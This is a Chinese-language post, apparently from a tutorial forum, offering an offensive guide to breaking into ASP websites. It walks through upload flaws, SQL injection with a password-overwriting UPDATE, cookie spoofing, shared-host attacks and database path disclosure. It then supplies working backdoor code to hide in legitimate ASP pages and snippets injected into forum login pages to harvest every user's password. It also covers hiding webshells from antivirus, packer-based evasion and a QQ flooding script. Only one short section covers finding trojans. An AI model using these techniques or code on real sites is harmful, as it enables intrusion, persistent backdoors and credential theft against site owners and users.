asp網(wǎng)站入侵技術(shù)綜合總結(jié)
當前位置:點晴教程→知識管理交流
→『 技術(shù)文檔交流 』
由于asp系統(tǒng)在互聯(lián)網(wǎng)上廣泛的應(yīng)用,針對asp系統(tǒng)的腳本攻擊最近鬧得是紅紅火火。在這些攻擊中,[br][br]攻擊者多是利用注入、暴庫、旁注、cookies欺騙等手段獲取管理員的權(quán)限,[br][br] 通過直接上傳或后臺備份等各種入侵手法[br][br] 取得網(wǎng)站webshell繼而控制整個站點[br][br] 接著通過webshell提升權(quán)限獲取服務(wù)器管理權(quán)限。[br][br] 什么是webshell?webshell就是一個相應(yīng)腳本語言編寫成的,具有在線編輯、刪除、新增文件、執(zhí)行[br][br]程序及sql語句等功能的腳本文件,具有隨意更改目標首頁,刪除文件等權(quán)限.[br][br] 如著名的老兵以及海洋頂端等就是這樣一個asp腳本文件,我們俗稱大馬以及小馬等.[br][br][br]-------------------------------------------------- [br][br]二:主要的入侵手段[br][br][br] 1.上傳漏洞[br][br] 一:如典型的動網(wǎng)上傳漏洞,我們直接訪問上傳頁面。[br][br] 二:進入網(wǎng)站后臺直接上傳腳本木馬,獲得webshell.[br][br] 因為有些網(wǎng)站系統(tǒng)對管理員十分信任.進入后臺后,只要找到上傳地點.就能任意上傳腳本木馬.[br][br] 三:添加上傳類型.[br] [br] 如果系統(tǒng)代碼限定了不允許上傳asp文件,那么我們可添加允許上傳asa cer等文件.然后將腳本木馬[br][br] 后綴名相應(yīng)的修改成asa cer.webshell一樣可以使用。[br][br][br] 四:通過后臺備份功能恢復(fù)asp后綴名[br][br] 如果無法上傳asp.asa.cer等后綴名文件。我們修改腳本木馬后綴名asp為jpg或者gif圖片后綴名[br][br] 上傳成功后.通過后臺備份數(shù)據(jù)庫功能恢復(fù)文件asp后綴名.[br][br] 五:抓包上傳[br][br] 通過抓取上傳真實地址以及管理員認證數(shù)據(jù)cookies.[br][br] 然后通過明小子上傳腳本木馬.獲得webshell.[br][br][br] 其實上傳方法還有很多.不過.也都是在基礎(chǔ)上發(fā)展而來.只要我掌握了知識.學(xué)習(xí)方法就十分的簡單[br][br][br] [br]2.注入漏洞[br][br] 在眾多針對腳本系統(tǒng)的攻擊中,注入可謂是鬧得最紅火的攻擊手段了.[br][br] 目前引起sql注入的原因主要是程序員在編寫帳腳本程序時對特殊字符過濾的不完全引起的.[br][br][br] 比如一個網(wǎng)址 [color=#0070af]http://xxx.com/asp?id=1[/color] [br][br] 是以id=數(shù)字形式結(jié)尾網(wǎng)址 我們通過 網(wǎng)址后加上個 and 1=1 和 and 1=2 分別訪問[br][br] 如果加上and 1=1 顯示正常頁面 加上 and 1=2 顯示出錯 返回錯誤頁面 [br][br] 則表示存在注入漏洞[br][br] 那么一個網(wǎng)址存在注入漏洞我們怎么去利用呢?[br][br] 首先可以使用工具.[br][br] 比如明小子.阿d注入工具.猜解帳號以及密碼等重要信息.[br][br] 對于sql數(shù)據(jù)庫如果無法破解猜解出來的md5加密密碼[br][br] 那么我們可以用以下命令: [br][br] http://注入網(wǎng)址;update admin set password='新md5密碼' where password='舊md5密碼'-- [br][br][admin為表名.] [br][br] 更改管理員密碼[br][br] 3.cookie詐騙[br][br] cookie是什么呢?[br][br] cookie是你上網(wǎng)時由網(wǎng)站所為你發(fā)送的值記錄了你的一些資料,比如ip,姓名密碼等。[br][br] 怎樣詐騙呢?[br][br] 如果我們現(xiàn)在已經(jīng)知道了xx站管理員的站號和md5密碼了 但是破解 不出來密碼 (md5是加密后的一[br][br]個16位的密碼)[br][br] 我們就可以用cookie詐騙來實現(xiàn),把自己的id修改成管理員的,md5密碼也修改成他的,通過工具[br][br]修改cookie 這樣就答到了cookie詐騙的目的,系統(tǒng)就會認定你就是管理員。[br][br][br] 4.旁注[br][br] 如果你的網(wǎng)站有難度.那么我們就入侵與你同一臺虛擬機的網(wǎng)站,通過入侵別人的網(wǎng)站[br][br] 拿到系統(tǒng)權(quán)限 也就能控制你的網(wǎng)站[br][br] 很多網(wǎng)站是存放在同一個虛擬機上的,也許某一臺虛擬機上有幾百個網(wǎng)站.那么我們只需要入侵[br][br] 入侵其中第一個.從而控制全部的網(wǎng)站.就是這么簡單![br][br][br] 5.暴庫[br][br] 一般而言,我們要獲取一個站點的shell,必須先獲得對方的后臺管理權(quán)限,要獲得對方的管理權(quán)限[br]當然先要得到對方的管理員用戶以及密碼!得到對方管理員用戶各種密碼的方法有很多.[br][br] 通過下載數(shù)據(jù)庫后繼而破解md5加密信息.從而獲得管理員賬號.[br][br] 但是一個網(wǎng)站的數(shù)據(jù)庫當然不會讓你隨意下載到.[br][br] 那么我們怎么去找數(shù)據(jù)庫地址呢?[br][br] 最簡單的就是暴庫了.[br][br] 通過服務(wù)器返回的錯誤信息提示暴出數(shù)據(jù)庫地址的。[br][br] 但是,這漏洞并不見,畢竟直接暴露出系統(tǒng)的數(shù)據(jù)庫.這是多么危險的事情呢![br][br] 暴庫方法:比如一個站的地址為 [br][br][color=#0070af]http://xxx.com/xxx.asp?id=1&id=2[/color] [br][br] 我們將com/dispbbs中間的/換成%5c 如果存在暴庫漏洞[br][br] 既可直接暴露出數(shù)據(jù)庫的絕對路徑 使用工具 迅雷等下載即可[br][br] 還有利用默認的數(shù)據(jù)庫路徑 [color=#0070af]http://xxx.com/[/color] 后面加上 conn.asp 如果沒有修改默認[br][br] 的數(shù)據(jù)庫路徑也可以得到數(shù)據(jù)庫的路徑(注意:這里的/也要換成%5c) [br][br] 那么暴庫的目的就是為了下載數(shù)據(jù)庫得到管理員賬號后上傳木馬腳本[br][br][br] 6.默認漏洞[br][br] 同一個網(wǎng)站系統(tǒng)或許有成千上萬的網(wǎng)站在使用這套系統(tǒng)[br][br] 而每一套網(wǎng)站系統(tǒng),當然有它最初默認的安裝路徑以及賬號密碼等[br][br] 我們通過大批量的搜索使用這套網(wǎng)站系統(tǒng)幾百萬個網(wǎng)站[br][br] 找到那些沒有修改默認設(shè)置的網(wǎng)站,沒有修改管理賬號,沒有修改后臺登陸地址,沒有修改數(shù)據(jù)庫存[br]放地址的目標[br][br] 進行入侵![br][br]-------------------------------------------------- [br][br] 看完上面的介紹 基于根本.所謂的入侵也就利用這些常見的微乎其微的小漏洞.[br][br] 并沒有什么驚天動地的 沒有什么所謂黑客 可以一下子沒有任何基礎(chǔ)原理和方法[br][br] 去入侵某個網(wǎng)站或服務(wù)器 [br][br] 那么我們是怎么入侵的? 無非的懂的多。知道的多.[br][br] 我們無非是比管理員更渴望知道.服務(wù)器.哪些地方不安全.哪些地方可以被我們所利用[br][br] 我們無非是比管理員更關(guān)心最新的系統(tǒng)漏洞[br][br] 我們無非是比管理員更勤勞的尋找系統(tǒng)的漏洞[br][br] 那么其實,只要我們通過學(xué)習(xí)實踐操作掌握了這些基礎(chǔ)的知識.[br][br] 所謂的入侵其實也就很簡單.[br][br] 所以希望大家.學(xué)成以后.不要自以為是.[br][br] 不過就是些小漏洞,無非也就是管理員的疏忽,這又能怎樣?[br][br] 其實我們懂的還太少.連電腦也是由美國的華德·愛肯所發(fā)明[br][br] 在我們看天書一般的英文代碼時.美國人就像看小說一樣能明白代碼的意思[br][br] 試問 [br][br] 這是天與地的差距嗎?[br][br] 或許,這完全是心靈上的差別.[br]--------------------------------------------------[br][br]三:漏洞利用[br][br] 入侵指定的目標,如何去入侵呢?[br][br] 方法非常簡單,我們尋找以上的基本漏洞[br][br] 只要存在這些漏洞,我們就發(fā)起攻擊[br][br] 為大家介紹一些這些漏洞的利用方法,也就是,找到這些漏洞,我們是為了干什么![br][br][br]1.上傳漏洞[br][br]上傳漏洞利用非常簡單[br][br]就是從這個上傳漏洞,直接上傳我們的腳本木馬,從而拿到webshell。繼而控制目標網(wǎng)站。[br][br]2.注入漏洞[br][br]注入漏洞分兩種不同類型access數(shù)據(jù)庫與mssql數(shù)據(jù)庫[br][br]首先,直接利用方法是,猜解管理員賬號以及密碼。[br][br]然后網(wǎng)站登陸后臺,從網(wǎng)站的后臺找到上傳點。從上傳點,上傳腳本木馬。繼而控制目標網(wǎng)站。[br][br][br]那么mssql數(shù)據(jù)庫。還可以猜解網(wǎng)站存放在服務(wù)器中的根目錄,通過差異備份[br][br]備份出一句話,然后通過一句話木馬客戶端,上傳腳本木馬,從而控制目標網(wǎng)站。[br][br][br]3.cookie詐騙[br][br]在得到目標網(wǎng)站管理員md5加密后的密碼,我們無法短時間破解出md5解密后的密碼[br][br]怎么辦呢?[br][br]我們直接通過 修改cookie相關(guān)信息[br][br]也就是把管理的賬號,id,md5加密的密碼。修改到相應(yīng)的位置[br][br]這樣再登陸,系統(tǒng)就認為我們就是管理員。[br][br]從而我們擁有了管理員的權(quán)限,[br][br]這個時候,我們就登陸后臺。找到上傳點。上傳腳本木馬。繼而控制目標網(wǎng)站。[br][br][br]4.旁注[br][br]旁注,非常有意思。[br][br]簡單的來說,網(wǎng)站的服務(wù)器,他是存放在特殊的地方,或者這么說。不是私人人經(jīng)營的[br][br]是由企業(yè)代為管理。[br][br]那么企業(yè)當然不可能只管理你一個網(wǎng)站。[br][br]所以,一臺虛擬機,可能有上百個網(wǎng)站,同時存放在這臺虛擬機上。[br][br]那么,我們試想,是不是通過入侵這臺虛擬機,就達到控制這一百個網(wǎng)站的目的呢?[br][br]所以呀。就是這么簡單。不管我們?nèi)肭诌@一百個網(wǎng)站中哪一個![br][br]只要我們達到入侵并控制了這臺網(wǎng)站服務(wù)器的目的。[br][br]我們就達到了控制這臺服務(wù)器一百個網(wǎng)站的目的[br][br] [br]5.暴庫[br][br]我們利用暴庫這個漏洞是為了什么呢?[br][br]顧名思義呀。暴庫就是暴出目標的數(shù)據(jù)庫地址[br][br]想到這里大家都會笑了吧[br][br]我懂了。暴了數(shù)據(jù)庫地址[br][br]當然是下載他的數(shù)據(jù)庫[br][br]然后通過數(shù)據(jù)庫得到管理員賬號[br][br]通過管理員賬號,進入后臺,接著找上傳點,接著上傳腳本木馬,接著呢?[br][br]當然就是深入的控制目標網(wǎng)站的服務(wù)器。[br][br][br]6.默認漏洞[br][br]默認漏洞,這個就笑呢[br][br]低級錯誤嘛。但是卻廣泛的存在于網(wǎng)絡(luò)中[br][br]怎么利用呢?[br][br]默認數(shù)據(jù)庫,我們就利用得到管理賬號入侵。[br][br]默認管理員賬號。我們就通過登陸后臺入侵
[p]就是這么簡單。[/p]
[p][/p]
[p][/p]
[p][/p]
[p][/p]
[p][/p]
[p][/p]
[p][/p]
[p][br]它和其他asp程序沒有本質(zhì)區(qū)別,只要是能運行asp的空間就能運行它,這種性質(zhì)使得asp木馬非常不易被發(fā)覺。它和其他asp程序的區(qū)別只在于asp木馬是入侵者上傳到目標空間,并幫助入侵者控制目標空間的asp程序。[/p]
[p]關(guān)于制作..[/p]
[p]建一個asp文件,內(nèi)容為 [br]找一個正常圖片ating.jpg,插入一句話木馬(比如冰狐的),用ultraedit進行hex編譯,插入圖片里,為了運行成功,還要搜索%和%,將其變?yōu)?0,(不要替換自己asp的),再把jpg文件開頭加入[/p]
[p] [br]2. 名稱:整蠱網(wǎng)吧[/p]
[p]先用精銳網(wǎng)吧輔助工具得到用戶名和密碼,然后用計算機管理聯(lián)結(jié)一臺機器,開telnet,連接,開共享,復(fù)制一個木馬過去運行即可。 3.名稱:感受md5暴力破解的魅力[/p]
[p]rainbowcrack用法先用rtgen生成庫 "rtgen md5 byte 1 7 5 2400 40000 all"[/p]
[p]1和7代表密碼最小和最大長度[/p]
[p]阿汀我再加個方法:[color=#355e9e]http://md5.rednoize.com/[/color] 在線破解[/p]
[p]或者到[color=#355e9e]http://md5lookup.com/?category=01-3&searck=on[/color][/p]
[p][br]4.很多時候我們做免殺木馬,不用懂匯編,用北斗加殼程序就能逃殺,還有很多加殼軟件,大家木馬加殼的時候最好多選擇不知名的加殼軟件。[/p]
[p][br]5.名稱:隱蔽的插入型asp木馬[/p]
[p](1)在我們要做手腳的asp文件里加入如下內(nèi)容[/p]
[p]<%if request("action")="ok" then%> [br]shell代碼插在這里,最好是小馬,還要加密一下 <%end if%> [br]訪問的時候在你作手腳的asp文件后面加上?action=ok,即可[/p]
[p](2)另一種方法,在我們要做手腳的asp文件里加入如下內(nèi)容[/p]
[p]<% [br]on error resume next [br]strfilename = request.querystring("filer") [br]set objstream = server.createobject("abodb.stream") [br]objstream.type = 1 [br]objstream.open [br]objstream.loadfromfile strfilename [br]objstream.savetofile server.mappath("ating.asp"),2 [br]%> [br]訪問的時候在做手腳的asp文件后面加上?filer=xxx[/p]
[p]xxx為你本地上傳的一個路徑如 c:ating123.asp[/p]
[p]上傳后在做手腳的asp的同文件夾中有ating,asp[/p]
[p][br](3)前提得到system權(quán)限,進入網(wǎng)站目錄下一層[/p]
[p]mkdir s…[/p]
[p]copy ating.asp s…/[/p]
[p]這樣殺毒軟件找不到的[/p]
[p]訪問http://網(wǎng)站/s…/ating.asp即可。[/p]
[p][br]6. 工具[color=#355e9e]http://hack520.tengyi.cn/chaojiyonghu.rar[/color],此工具在該電腦生成一個超級用戶[/p]
[p]用戶名為:hack 密碼110,在dos下和計算機管理器上看不到你建立的用戶,并且是刪除不掉的。[/p]
[p]7.名稱:qq群腳本攻擊[/p]
[p]打開qq對話誆,復(fù)制消息,然后,下面的內(nèi)容保存為.vbs 文件,運行即可。[/p]
[p][/p]
[p]set wshshell= wscript.createobject("wscript.shell") [br]wshshell.appactivate "qq信息攻擊腳本" [br]for i=1 to 20 [br]wscript.sleep 1000 [br]wshshell.sendkeys"^v" [br]wshshell.sendkeys i [br]wshshell.sendkeys "%s" [br]next[/p]
[p][/p]
[p]8.搜索:程序制作:萬鵬 有免費申請空間的,直接上傳asp馬即可。[/p]
[p][br]9. 名稱:全面找出你站上的asp木馬[/p]
[p](1) 用殺毒軟件[/p]
[p](2) 用ftp客戶端軟件,點"工具"->"比較文件夾"[/p]
[p](3) 用asplist2.0.asp上傳到站點空間查看,一般功能多的asp我估計就是asp木馬[/p]
[p](4) 用工具beyond compare[/p]
[p][br]10名稱:拓展思路拿dvbbs帳號 "一個人的圣經(jīng)"的動畫[/p]
[p][br](1)以前獲得webshell后想進入dvbbs的后臺,想要管理員的密碼,可以這樣,[/p]
[p]老辦法:[/p]
[p]修改admin_login.asp得到明文dvbbs后臺密碼[/p]
[p]在"username=trim(replace(request("username")這行后面[/p]
[p][/p]
[p]dim fsoobject [br]dim tsobject [br]set fsoobject = server.createobject("scripting.filesystemobject") [br]set tsobject = fsoobject.createtextfile(server.mappath("laner.txt")) [br]tsobject.write cstr(request("password")) [br]set fsoobject = nothing [br]set tsobject = nothing[/p]
[p][/p]
[p]只要管理員登陸后臺,在目錄下就生成了laner.txt。[/p]
[p][br](2)login.asp中case "login_chk"下:[/p]
[p][/p]
[p]on error resume next [br]dim rain [br]set rain=server.createobject("adodb.stream") [br]rain.type=2 [br]rain.charset="gb2312" [br]rain.position=rain.size [br]rain.open [br]rain.loadfromfile server.mappath("laner.asp") [br]rain.writetext now&request("username")&"text:"&request("password")&chr(10) [br]rain.savetofile server.mappath("laner.asp"),2 [br]rain.close [br]set rain=nothing[/p]
[p][/p]
[p]這樣laner.asp將獲得全部登陸人的登陸時間,用戶名和密碼。[/p]
[p][br](3)如果你有自己的網(wǎng)站或者另外的webshell(強烈建議使用): 可以建立目錄laner,在里面建立一個空的laner.asp和如下代碼的rain.asp:[/p]
[p][/p]
[p]<%if request("n")<>"" and request("p")<>"" then [br]on error resume next [br]dim rain [br]set rain=server.createobject("adodb.stream") [br]rain.type=2 [br]rain.charset="gb2312" [br]rain.position=rain.size [br]rain.open [br]rain.loadfromfile server.mappath("laner.asp") [br]rain.writetext now&"name:"&request("n")&"password:"&request("p")&chr(10) [br]rain.savetofile server.mappath("laner.asp"),2 [br]rain.close [br]set rain=nothing [br]end if%>[/p]
[p][/p]
[p]11. 名稱:利用qq在線狀態(tài)抓鴿子肉雞[/p]
[p]生成qq在線狀態(tài),把里面的地址改成木馬地址,發(fā)到論壇在login.asp那里插入一句:[/p]
[p][/p]
[p]response.write"
該文章在 2010/7/14 1:47:04 編輯過 |
關(guān)鍵字查詢
相關(guān)文章
正在查詢... |